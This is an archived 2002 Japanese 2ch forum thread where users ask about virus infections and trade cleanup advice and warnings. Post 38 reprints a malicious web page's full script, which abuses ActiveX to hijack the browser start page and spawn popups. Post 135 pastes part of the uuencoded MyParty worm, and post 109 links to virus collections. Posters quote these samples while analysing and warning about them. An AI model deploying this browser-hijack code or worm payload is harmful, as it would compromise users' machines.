5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ウィルス情報&質問 総合スレッド☆

1 :名無しさん@お腹いっぱい。:02/01/14 03:53
ウィルスに関わる話題・質問はこちらに

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp

[関連リンク]過去ログ・関連スレ等>>2-10あたり
補足>>1-50

2 :名無しさん@お腹いっぱい。:02/01/14 03:54
過去スレhttp://pc.2ch.net/test/read.cgi/sec/999636595/l50

[ウィルス対策ソフト]
Norton Internet Security2002 Ver.4 http://pc.2ch.net/test/read.cgi/sec/1009681166/l50
ウイルスバスター2002 Part2 http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
マカフィーってだめなの!PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50
[ウィルス対策ソフト(無料)]
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

3 :名無しさん@お腹いっぱい。:02/01/14 03:54
新種のウィルスが流行したときは
専用スレのリンクよろしくお願いします

「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50

4 :名無しさん@お腹いっぱい。:02/01/14 03:59
「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ

ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

5 :名無しさん@お腹いっぱい。:02/01/14 03:59
4げっとー!

6 :名無しさん@お腹いっぱい。:02/01/14 04:00
またIEにセキュリティホール! http://pc.2ch.net/test/read.cgi/sec/1008610094/l50

7 :名無しさん@お腹いっぱい。:02/01/14 04:02
トロイ関係のスレってありませんでした?

8 :名無しさん@お腹いっぱい。:02/01/14 05:25
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50

9 :名無しさん@お腹いっぱい。:02/01/14 06:32
キーボードの[Ctrl]キーと[F]キーを同時に押すと
ページ内検索が出来ます

この機能で スレッド一覧や過去ログから
目的の内容を探すと便利です

10 :名無しさん@お腹いっぱい。:02/01/14 06:33
WORM_GONE.A http://pc.2ch.net/test/read.cgi/sec/1007514716/l50

11 :名無しさん@お腹いっぱい。:02/01/14 06:34
 Mac用ウイルス対策ソフト http://pc.2ch.net/test/read.cgi/sec/1007675941/l50

12 :名無しさん@お腹いっぱい。:02/01/14 06:35
virus下さい。http://pc.2ch.net/test/read.cgi/sec/996909531/l50 

13 :名無しさん@お腹いっぱい。:02/01/14 06:37
みんなでウイルスつくろうよ!!http://pc.2ch.net/test/read.cgi/sec/1008248305/l50 

14 :名無しさん@お腹いっぱい。:02/01/14 06:38
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50

15 :名無しさん@お腹いっぱい。:02/01/14 06:43
http://www7.ocn.ne.jp/~moneys/

16 :名無しさん@お腹いっぱい。:02/01/14 06:58
確かハイブリスのスレがどこかにあったはず
でも見つからない

17 : :02/01/14 07:11
age

18 :00:02/01/14 12:46
http://headlines.yahoo.co.jp/hl?a=20020113-00000006-vgb-sci

19 :名無しさん@お腹いっぱい。:02/01/14 23:41
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50

20 :名無しさん@お腹いっぱい。:02/01/15 03:22
新しく感染した人はいないのかな?

21 :名無しさん@お腹いっぱい。:02/01/15 22:46
ウィルス関係のスレがあったら
このスレのリンクを貼っておいてください
データベースとしても使えるので

22 : :02/01/15 22:54
いまさらながら、Nimdaがうるさい。
中国(大陸?)からきているようだ。市ね。

23 :名無しさん@お腹いっぱい。:02/01/16 00:49
Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp

24 :名無しさん@お腹いっぱい。:02/01/16 00:50
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

25 :名無しさん@お腹いっぱい。:02/01/16 19:06
不謹慎とは思うが
ウィルス系のスレはみんな平和だと暇

26 :名無しさん@お腹いっぱい。:02/01/17 18:45
コードレッドパート5 日本政府は反省汁
http://pc.2ch.net/test/read.cgi/sec/997783469/l50

27 :名無しさん@お腹いっぱい。:02/01/18 11:37
確かにみんなが右往左往するほうが面白い(w

28 :(;´Д`):02/01/18 22:12
tp://www.geocities.com/ccsacla/images0012.jpg
これを踏んでしまったんですが、どうなるんでしょうか?

29 :墓守:02/01/18 23:37
>>28
海外串経由で診たけど。ウイルスさんがインストされるだけ。
Yahooと警察庁に通報しておきました。

30 :名無しさん@お腹いっぱい。:02/01/18 23:39
>>28
IE使っててスクリプトブロックしてなかったら、スタートページが
//www.geocities.com/fes74592/ssopn.html の、concon含んだブラ
クラペーヂになる。んで、ブラウザのオプションは使えなくなるから「ツ
ール」からは直せなくなる。

スクリプトブロックしててもフレームでssopn.html読むからmailtoはよ
んぢゃうけど。
大したもんぢゃないね(´,_ゝ`)プッ

reg値いぢる直し方は、他の人に任せる。。
若しくは、JS.ExceptionでアンチVIRサイト検索して見て。



31 :30:02/01/18 23:45
>>29
にょ?
別にインストはされないでしょ?
んなスクリプトどっかに書いてあったかな???
システム改変はするけど。。

mailto有るからウザイこたーウザイが。。。。

32 :墓守:02/01/19 00:07
>>31
ソース見直します・・・・アクティブXの文字が見えたので、「ははぁ〜ん、エクセプションか」なんて思い込んだので。

33 :(;´Д`):02/01/19 00:15
>>29>>30>>31 ありがとうございました。
スタートページは変えられてないみたいでしたが。
強制終了した後、PCの動作がすごく遅くなってしまったんですが、
Temporary Internet Fileの「0012.jpg」ファイルを削除したら治りました。
他にもやばい事が起こるんでしょうか?

34 :30:02/01/19 00:22
>>33
良かったね。スクリプトは切ってあったのね?多分。
スクリプト応用されれば色々だろうけど、、、
だからJS.Exceptionも色々種類あるし。。。

>>32
ざっとしかソース見てないのよ。漏れ(w
なんか面白いもの見つかったら書いてあげて下さい。。。

35 :>>33:02/01/19 00:22
view-source:http://www.geocities.com/ccsacla/images0012.jpg

36 : :02/01/19 00:22
ようこそ、2チャンネラーの皆様(^○^)/
どうして貴方がここに来る羽目になったかというと、長い説明が必要に
なります。私は、2年前の12月より、田中康夫長野県政に関するページ
を立ち上げました。それ以前から、田中康夫氏に関して、ちまちま書い
ていたのですが、どうも特定の人々の勘に障ったらしく、選挙期間中に
当方への誹謗中傷スレが立ち上がりました。選挙後、しばらくはなりを
潜めていたのですが、どうやら、いろんな所で恨みを買ったらしく、ま
た、田中知事への不信任案提出が囁かれる昨今のせいか、私をターゲッ
トとした誹謗中傷スレが次々と立ち上がりました。航空・船舶板に「売
れない作家&航空ヲタク「大石英司」を叩け」ニュース速報板に「★作
家がネット上でクラッカーに挑戦状★」(どうやら、クラッカー諸氏に、
私のサイトをクラックしろと唆しているらしい↑)マスコミ板に「★売れ
ない無名三流作家を救え★」タイトルから察するに、この3本は、恐ら
く同一人物が立ち上げたスレと思われます。船舶・航空板にスレが出来
てしばらく後、板違いを根拠に削除を求めましたが、受け入れられませ
んでした。今後とも恐らくは、何の関係もない板に続々とスレが立ち続
けることでしょう。ご迷惑をお掛けしますが、遺憾ながら私には法的措
置を講じる以外の術はありません。(それだって実効性はゼロと言って
良い)たいへん不愉快に思っておりますし、実害も被っておりますが、
不特定多数の顧客を相手にしている以上、ある程度は甘受すべきものと
考えます。残念ながら運営サイドに削除する意思があるとは思えず、し
かしそれは、サーバー上に無用の負担を掛けている以上、運営サイドの
コストであって、幸いにして私のコストではありません。板を移動しつ
つせっせと同様のスレを立ち上げているこの迷惑行為の当人、もしくは
集団が何を意図しているのかは推察するしかありません。私に不愉快な
思いを強いて、田中康夫長野県政への批判を止めさせたいのか(←無駄
なことです)、何処かで私に痛い目に遭わされ、2ちゃんねるという格
好の復讐の場を発見して興奮しているのか。だとしたら、私にはこの人
物の心の平安のために貢献できることは何もありません。ご本人が、某
か復讐に優る人生の関心事を発見してくれることを祈るのみです。
さて私は、貴方がここへ来て、私の本を買ってくれるかも知れないなん
て景気の良いことは考えておりません。しかし、ここに大石英司という
作家がいて、こんなこをやっているということが貴方の脳裏にインプッ
トされるだろうことを、ささやかな喜びとするものです。


37 :名無しさん@お腹いっぱい。:02/01/19 00:24
33のメアド欄に萌え

38 :醤油:02/01/19 00:28
<html>
<head>
<title></title>
</head>
<body onUnload="unload()"><iframe src="ssopn.html">
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>
</APPLET>");
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.geocities.com/fes74592/ssopn.html");
//Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions", "1");
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{setTimeout("f()", 1000);
}init();
</script>
<img src="ok.jpg">
<script>
function unload() {
for(i=1;i<=5;i++){
window.open('ssopn.html')
window.open('index.html')
}}</script>
</body></html>
<noembed><noscript><noscript><noscript><xml>
View-Source:http://www.geocities.com/fes74592/
View-Source:http://www.geocities.com/fes74592/images0012.jpg
View-Source:http://www.geocities.com/fes74592/ssopn.html
http://www.geocities.com/fes74592/ok.jpg
View-Source:http://www.geocities.com/fest7742/
View-Source:http://www.geocities.com/fest7742/images0012.jpg
View-Source:http://www.geocities.com/fest7742/ssopn.html
http://www.geocities.com/fest7742/ok.jpg
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
<META HTTP-EQUIV="Refresh" CONTENT=25;URL="ssopn.html">

39 :↑注意注意注意注意注意注意注意!!!!:02/01/19 00:30
 

40 :(;´Д`):02/01/19 00:34
>>35
気がつきませんでした、すみません…。

41 :名無しさん@お腹いっぱい。:02/01/19 00:35
な、なんでみんなメアド書きたがるんだ。。


42 :名無しさん@お腹いっぱい。:02/01/19 01:09
あまりにも安全な行動しかしてないと
フリーメールでRe:メールをもらうくらいしか
おきませんね

43 :(゜▼゜*):02/01/19 01:23
jpgで中身がhtmlなヤツをhtmlとして開いてしまうのは
Ieだけでしたっけ?

44 :ガイシュツだったらスマソ:02/01/19 01:42
どこにも公開してないメールアドレスに、登録したはずのないメーリングリスト経由で
exeファイルのついたメールが2通きてるんだけど、これってウイルスだよね?
タイトルは化けてて→ !"#%&')*+-/0244689<= と  !"#$
sumif.exe と DPLAYSVR.EXE っていうのが添付されてた。

誰か知ってる人いたら教えてください よろしこ

45 :名無しさん@お腹いっぱい。:02/01/19 02:15
>>44
ウイルスかどうか関係無しに、
身に覚えのないメール、身に覚えのない添付ファイル
なら削除すべきでしょうな…。

ちなみに勉強のためなら、そのファイル名を
Googleで検索したら自分でも調べられますよ。

46 :名無しさん@お腹いっぱい。:02/01/19 06:23
>>43
自分でhtmlファイルの拡張子をjpgにして
ためしてみるといいです

47 :名無しさん@お腹いっぱい。:02/01/19 08:15
>>44
どこにも公開していないと言いながら読んでいるというと事は、そのメアドを知っている奴がいるということだろ?
なんの不思議も無いと思うが…


48 :名無しさん@お腹いっぱい。:02/01/19 13:25
>44
それってDIONですよね!!
今朝そのメールとしらない人経由のメールがたくさん・・
どうしよう!!
文字化けメールは削除しましたがその後の対応は・・・・

49 :名無しさん@お腹いっぱい。:02/01/19 14:03
にしても、最近来るウイルスメールって、ジェネレータで
作成したらしいウイルス、やたら多くない?

50 :名無しさん@お腹いっぱい。:02/01/19 14:20
>>16
ハイブリスのスレってこれ?

KDMEMPKD.EXEってなに?
http://pc.2ch.net/test/read.cgi/sec/1011333304/l50

51 :(゜▼゜*) :02/01/19 17:23
>>46
はい。
当然Ieでは試したうえで訊いてます。
ブラウザ種類いっぱいありすぎるんで、
他のブラウザの情報を知ってる方に
訊いてるんですけどね。。。

ひょっとしてイジワルで答えてます??


52 :名無しさん@お腹いっぱい。:02/01/19 17:45
>>48
うちにもいっぱい来てたよ。

53 :名無しさん@お腹いっぱい。:02/01/20 01:59
どうやらあるウイルスに感染したようでネットにつないでいると突然幽霊の女性の画面が出てきてしまいます。
ウイルスチェックしてもだめなんですがどうすれば良いのでしょう?

54 :名無しさん@お腹いっぱい。:02/01/20 02:15
http://www.forest.impress.co.jp/article/2001/11/21/hikaru_1r.gif
まさかと思うけどこれじゃないよね。

55 :名無しさん@お腹いっぱい。:02/01/20 03:48
>>54
すみません、便乗で。
私、それで困ってます。恥ですか?
助けてください!



56 :名無しさん@お腹いっぱい。:02/01/20 08:36
>>54
それです!!どうやったら削除できるの?

57 : :02/01/20 09:19
顔が出てくるというのは、ウィルスではないんで、
初級ネット板の下記のスレッドにどうぞ。
対処法もそっちで見てください。

http://pc.2ch.net/test/read.cgi/hack/1011083919/

本当に不用心で、挙げ句の果てにうろたえるヤツが多いなあ。
でもって調べないし。

58 :56:02/01/20 11:22
>>57
感謝

59 :おしえて:02/01/20 13:26
なんかシステムホルダの中に「いたずらしてごめんね」って
いうファイルが1000個もあった。
でウィルススキャンしたら「トロイの木馬」が3匹いて
それらは削除したんだけど、このウィルスっていったい何をするんですか?

60 : :02/01/20 14:48
本来的にはウイルスとトロイの木馬は別物だったんだけど、
ウイルスが広義に使われるようになっているからなあ。
基本的にトロイの木馬っつったら、
内部に入り込んで破壊活動するもの。
神話か歴史か知らないけど、でかい木馬の中に兵隊がひそんで
鉄壁状態の町の中にまんまと入り込んだという故事から。
破壊活動の内容は、プログラムによりさまざま。
ただし、ウイルスのように増殖活動するとは限らない。
(元々は破壊だけして増殖しないものの名称だった。)
ウイルス、ワーム、トロイの木馬などは
用語解説サイト
http://www.e-words.ne.jp/
とかや、アンチウイルスソフトの会社サイト
(Badtransとかのスレにリンクがある)の解説ページで
もちょっと詳しいことや正確なことが分かる。

61 :実際でかい木馬がある。:02/01/20 15:05
ほんとにでかい。

62 :助けて〜:02/01/20 15:09
なんか変なファイルダウンロード(ヒカルだったか?)
したら、青い顔が、出るようになっちゃって
全部削除したんだけど、まだ出るよ〜
心臓に悪いので、だれか教えて?

63 :繁体字中国語:02/01/20 15:09
每經過一定的時間,螢幕上會突然出現女鬼圖片的整人程式。
本程式啟動後並不會顯示任何視窗或訊息,但是此時程式已常駐至電腦的記憶體內,
數分鐘後,螢幕上會突然出現一個女鬼的圖片,同時喇叭也會發出驚悚的尖叫聲。

※ 警告:孩童、孕婦、及心臟或精神疾病患者,請勿執行本程式!!!

http://www.geocities.co.jp/SiliconValley-Cupertino/9822/
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/mysoft.html
http://my.vector.co.jp/servlet/System.FileDownload/download/http/0/217070/pack/win95/amuse/joke/hikaru04.zip
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/img/madoka.jpg



64 :62 何でダウンロードしたん?:02/01/20 15:11
警告:孩童、孕婦、及心臟或精神疾病患者,請勿執行本程式!!!



65 :助けて〜:02/01/20 15:13
また 出たよ!

66 :おしえて:02/01/20 15:26
>>60
どうもです。
いろいろチェックしてみたけど、どこも破壊されてないみたい
なんだけど。
特にもんだいないですか?

67 : :02/01/20 15:55
変な顔がどうのこうの書いているヤツは>>57ぐらい見ろや。
あちこちの板やスレでこればっかりだ、とにもお。

>>66
破壊されてない「みたい」と書かれてもなあ。
とにかく、相手はプログラムなんだから、
どういう活動をするかは作り手の考え方次第。
何か(特定日時、ユーザーの特定アクションなど)をきっかけに
何か(特定ファイルの消去など)をするわけだけど、
ラッキーだったら、
きっかけがなかった、とか、
何かをできなかった(消去対象がWordファイルとかだったら
Word使っていなかったなら何もされないわなあ)とかで、
破壊されないことはあり得る。
まあ、注意して用心しながらやっていってくらはい。

68 :おしえて:02/01/20 16:16
>>67さんありがとう
ということは今後何かのきっかけで、作動する恐れがあるってことですよね。
ウィルススキャンでひっかかった「トロイの木馬」は削除したのに、
何か形をかえて潜んでいるってことですか?

もしそうなら、何をすれば良いんでしょう?


69 : :02/01/20 17:13
>>68
アンチウイルスソフトを最新の状態にして除去したのなら
それ以上どうしようもないでしょ?
データなどのバックアップはしっかりとるとか、
セキュリティに注意して運用していくしかしかたないんじゃ
ないの?

アンラッキーにも破壊が行われていた場合、
見つかり次第修復するっきゃないでしょ?

ラッキーにも破壊が行われておらず、
判別できた限りの「トロイの木馬」を除去できたとしても
もしか、アンチウイルスソフトが対応できていない新種で、
除去される前に何かしていないとはいいきれないわなあ。

「多分大丈夫でしょう」とか書くのは簡単だけど、
そんなの何の保証にもならないんだし。
もうこれ以上質問しても答えられることはないように思うよ、
正直なところ。

70 :おしえて:02/01/20 17:58
>>69
どうもでした。なにも起こらない事を祈ります。

71 :名無しさん@お腹いっぱい。:02/01/21 20:29
訳のわからない添付ファイルは
まず開かないほうがいい

72 :マジレス希望です:02/01/21 20:59
日付: 2002/01/21 時刻: 18:56:34
規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ (68.52.197.223、 3274)

2ch見てたら,突然警告音!!!  ↑
助けてください
これってヤバイですか???
モウ感染してるのか???
ノートンでウイルススキャンしたら大丈夫そうだったが
マジ教えてくださいすいません

73 :名無しさん@お腹いっぱい。:02/01/21 21:36
>>72
その前に、思いっきりマルチな君の投稿をなんとかしたまえ。

74 :名無しさん@お腹いっぱい。:02/01/21 23:21
BFEBLOBF.EXE
ってウイルスですか?
なんかたびたび送られてくるんですが

75 :名無しさん@お腹いっぱい。:02/01/21 23:22
>>74
ウィルスです。それも出尽くした感すらある。

76 :名無しさん@お腹いっぱい。:02/01/21 23:24
>>74
どうぞ。ファイル名は違うけどいっしょです。
http://pc.2ch.net/test/read.cgi/sec/1011333304/l50

77 :墓守:02/01/21 23:26
>>74
Hibris B。
最初の二文字と最後の二文字が同じ。

78 :墓守:02/01/21 23:29
Hybrisでしたっけ、スペル?

79 :名無しさん@お腹いっぱい。:02/01/21 23:32
そうみたい。。

80 :ヘルプ:02/01/21 23:38
TRO J_SUBSEVN.213ウイルスに感染ました。対処方教えてください。
前もTRO系に感染し、
表向きは駆除したのですがレジストリをいじらないと完全駆除できなかったので
泣く泣くPC初期化したのですが、復活まで2日もかかったので助けてください。
とりあえず、センター行って情報見てきます。

81 :名無しさん@お腹いっぱい。:02/01/21 23:42
>>80
たまにはレジストリもいぢってやってください。

82 :名無しさん@お腹いっぱい。:02/01/21 23:50
74です。
情報下さったみなさんありがとうございました!

83 :墓守:02/01/21 23:53
>>80
それって有名だから、ノートンでもバスターでもチェックできるんだけど。何回も感染するのは、怪しくない?近いところに犯人がいるかも。ad-aware使って他のトロイが入っていないか、チェックした方がいいですよ♪

84 :ヘルプ:02/01/22 00:00
センター行ってきました。やっぱり前と同じレジいじりが必要そうです。
墓守ad-awareてなんですか?

85 :ヘルプ:02/01/22 00:01
墓守さん、ad-awareてなんですか? でした。

86 :名無しさん@お腹いっぱい。:02/01/22 00:03
>>85
検索できるチャンス

87 :墓守:02/01/22 00:03
>>84
トロイ検出では、世界でもっとも使えるツールです。

88 :名無しさん@お腹いっぱい。:02/01/22 00:03
>>84
あれって、起動させるレグ値、色々カスタマイズできなかったっけ??
.ini関係にもhook出来たような。。。
デフォで仕掛けてあったなら別に良いけど。。


89 :ヘルプ:02/01/22 00:16
ad-aware使えばレジストリいじらなくても医院ですか?
とりあえず落としてきます。

90 :名無しさん@お腹いっぱい。:02/01/22 00:19
>>89
レジストリぐらいいじってください。

で↓をお気に入りに登録してください
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

91 :ヘルプ:02/01/22 00:26
>90
いじってみます。
システムエディタでいいんですよね。


92 :名無しさん@お腹いっぱい。:02/01/22 00:28
>>91
bubu〜〜〜〜
それはsysedit
regeditの方。


93 :ヘルプ:02/01/22 00:32
ありました。
システムエディタとレジストリて違うんですか?

94 :ヘルプ:02/01/22 00:34
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ない?RUN

95 :名無しさん@お腹いっぱい。:02/01/22 00:35
>>93
システムエディタ = お兄さん
レジストリエディタ = 弟

96 :ヘルプ:02/01/22 00:36
>95
なるほどね!!

97 :墓守:02/01/22 00:37
おまけ。
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce


98 :ヘルプ:02/01/22 00:40
お気に入りのついかの仕方がどうも分からんのですが?

99 :名無しさん@お腹いっぱい。:02/01/22 00:41
>>98
それよりサブセブンは駆除できたのかい?

100 :名無しさん@お腹いっぱい。:02/01/22 00:42
おめこ。
〜〜\CurrentVersion\RunService

101 :ヘルプ:02/01/22 00:43
まだ解凍しておりません。Ad-aware。
とりあえずためしてみます。

102 :名無しさん@お腹いっぱい。:02/01/22 00:49
あ、あのさ、、、
Ad-awareってSub7鯖が起動用に設定するreg値も検出するの?・・・・
つか、怪しいreg値は取り敢えずみんな検出してくれるのかな。。。

103 :ヘルプ:02/01/22 00:49
全然英語分からんけど3つあったみたい。
日本語パッチてないのか探してきます。

104 :名無しさん@お腹いっぱい。:02/01/22 00:53
Ad-awareで駆除できたらノートンいらねーべ。

105 :sage:02/01/22 01:00
今日騒いでたマルチポスターです.
ご協力ありがとうございました.


106 :ヘルプ:02/01/22 01:00
Ad-awareパッチなさそう。

107 :102:02/01/22 01:06
>>104
こ、今度、、、暇有ったらSub7鯖使って
ぢ、ぢっけんしてみるぢょ。。。2.2でいいかな
・・・さ、最近バクダン流行ってるし。
も、漏れはこれから、ぢばくマニアだ。。。
みんな、流行に乗り遅れるな!!

108 :ヘルプ:02/01/22 01:11
センター情報の通りチェックしてみました。
とりあえず大丈夫そうです。
多少不安(検出ウイルスと情報ウイルス名が微妙に違う。)ですが。

109 :未知のウイルス:02/01/22 02:12
http://vx.netlux.org/dat/vct.shtml

ウイルス250種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(右端の上から6番目)
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf

110 :通りすがも:02/01/22 04:42
http://www.ebcvg.com/binary.php
↑このページ250種もある?
2ページ目あわせても205種類しかないと思うんだけれど・・・。

111 :名無しさん@お腹いっぱい。:02/01/22 04:46
Ad-awareはこちらで
http://pc.2ch.net/test/read.cgi/sec/1010952801/1-10

112 : :02/01/22 15:53
   

113 :名無しさん@お腹いっぱい。:02/01/23 00:21
なぜかセキュ板がすごい重たいんですけど なぜ?

まさか8月のCord Redの悪夢みたいに
新種のウィルスでも暴れ出したとか?

114 :名無しさん@お腹いっぱい。:02/01/23 00:24
>>113
たったいま正常になった

115 :名無しさん@お腹いっぱい。:02/01/23 00:25
>>113
漏れが今↓ツール使ってこのスレにものすごい勢いでsage連続カキコしてるからさ。。
ttp://pc.2ch.net/test/read.cgi/sec/995357953

・・・・ぢゃまするなよ。。。。

116 : :02/01/23 14:49


117 : :02/01/25 07:15
    

118 :名無しさん@お腹いっぱい。:02/01/25 07:59
ここ逝け!
https://www.netsecurity.ne.jp/article/1/3799.html

119 :名無しさん@お腹いっぱい。:02/01/25 11:17
ネット初心者です。無料でインストールできるワレザーソフトのダウンロードサイトがありましたら教えて頂けませんか?   

120 ::02/01/25 11:37
ソフトぐらい買えよ(w

121 :名無しさん@お腹いっぱい。:02/01/26 18:55
何か重くない?
自分のとこだけ?
何か新種のウィルス流行って無い?

122 :チチカ:02/01/26 23:38
あのー、美女が出てきてそのうちその美女の目が黒くなって
そのうちキャーって叫び声がするウィルスって知ってる人
いますか?友達が感染したみたいで・・・
ウィルスかどうかもまだ分かってないんですけどね。

123 :名無しさん@お腹いっぱい。:02/01/26 23:41
それはコワイ(w

124 :名無しさん@お腹いっぱい。:02/01/26 23:47
>>122
大変だ!新種じゃないのか?

125 :チンコ:02/01/26 23:56
>>122
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_MADO.A
これ↑はやってんの??

126 :名無しさん@お腹いっぱい。:02/01/27 00:04
Norton Anti Virusを使っているのですが
設定画面で「このページでスクリプトエラーが発生しました」と出て
設定が変更できません。
それから再起動したら赤い画面が出て
「ウィルススキャンエンジンのデータベースを初期化できません」と出ます。
Live Updateをしても何も起こりません。
これはどういう事なのでしょうか?

127 :墓守:02/01/27 00:17
>>126
定義ファイルのアップロードに失敗して、スクリプトエラー表示はあるけど。
「初期化できません」の画面は見たことないですね。

再インストしたら?
HDをはずして、他のPCのスレーブに接続してウイルススキャンするのもオツ。

128 :チチカ:02/01/27 03:29
122です。ウィルスであることを確認しました。
2CHのあるサイトからDLしたものだそうです。
皆さんも気をつけてください。

ウイルス名: TROJ_MODNAR.A

別 名: W32/Modnar@MM, W32.Modnar.Worm@mm, TROJ_DOCPIF.A

ウイルス種類: トロイの木馬型(ワーム)

プラットフォーム: Win9x/Me/NT/2000

暗号化: No

ウイルスサイズ: 180224bytes

初発見日: 2001年7月末

発病条件 1: ファイル実行時

破壊活動 1: メールを自動送信する


129 :名無しさん@お腹いっぱい。:02/01/27 03:59
>>122
それトロイだってさ。速報板の方が情報多いかも。
実行すると、外部から侵入し放題になります。

130 :名無しさん@お腹いっぱい。:02/01/27 04:17
JS_EXCEPTION.GENとゆうウイルスについて教えてください


131 :名無しさん@お腹いっぱい。:02/01/27 04:27
>>130
http://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5

132 :名無しさん@お腹いっぱい。:02/01/27 04:43
>>131
どうもです。あんまり心配しなくてもいいでホッとしました。

133 :名無し:02/01/27 06:20
>>125
ニュース速報板で大問題になってます。

http://choco.2ch.net/test/read.cgi/news/1012065580/


134 : :02/01/28 12:26
 

135 :初心者代表:02/01/28 17:32
www.myparty.yahoo.com
っていうWindowsバイナリが
uuencodeで添付されてきたひといますか?

Hello!

My party... It was absolutely amazing!
I have attached my web page with new photos!
If you can please make color prints of my photos. Thanks!


begin 666 www.myparty.yahoo.com
M35J0``,````$````__\``+@`````````0```````````````````````````
M````````````````````@`````X?N@X`M`G-(;@!3,TA5&AI<R!P<F]G<F%M
M(&-A;FYO="!B92!R=6X@:6X@1$]3(&UO9&4N#0T*)`````````!010``3`$#
M`)(B4CP``````````.``#P$+`04``'`````0````T```X$P!``#@````4`$`


136 :名無しさん@お腹いっぱい。:02/01/28 17:33
>>135
うちにも来た。 情報収集中…

137 :名無しさん@お腹いっぱい。:02/01/28 17:35
>>135
来たよ。

Norton AntiVirusの最新パターンファイルでチェックしても問題
無かったのですが、新種のウイルスでしょうか?


138 :名無しさん@お腹いっぱい。:02/01/28 17:37
お、新種のウィルスか・・? ワクワク

begin666ってのが怪しい感じだな・・

↓これも存在しないみたいだし・・
http://www.myparty.yahoo.com/

139 :NOTEPAD.EXE:02/01/28 17:38
WARM_MYPARTY.Aというものらしいです。

140 :初心者代表:02/01/28 17:44
新手のワームでした。みなさんもお気をつけて。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MYPARTY.A


141 :こんなんでました:02/01/28 17:45
おそらく、www.miparty.yahoo.comというコマンドファイルと思われ。



142 :NOTEPAD.EXE:02/01/28 17:46
>>138
begin <mode> <file>
はuuencodeの開始行だよ

143 :初心者代表:02/01/28 17:48
>>141
えぇ、なかなかうまい名前だなぁと感心しましたよ(w


144 :名無しさん@お腹いっぱい。:02/01/28 17:55
>>135
うちも来た。
macafee.com でも検出できず。


145 :名無しさん@お腹いっぱい。:02/01/28 17:58
>>140

情報公開日: 1 時間, 25 分前
(2002年01月28日 午後 4:29:04 GMT -0800)

できたてほやほや...


146 :名無しさん@お腹いっぱい。:02/01/28 18:01
>>140
アクセス重いっす。

147 :負荷分散:02/01/28 18:12
MYPARTY
特徴:
 これは、ワームに分類される「トロイの木馬型」不正プログラムで
す。自身のコピーを頒布するワーム活動を行います。

対応方法:
検出方法:

1)最新の検索エンジン・パターンファイルにアップデートしてくださ
い。

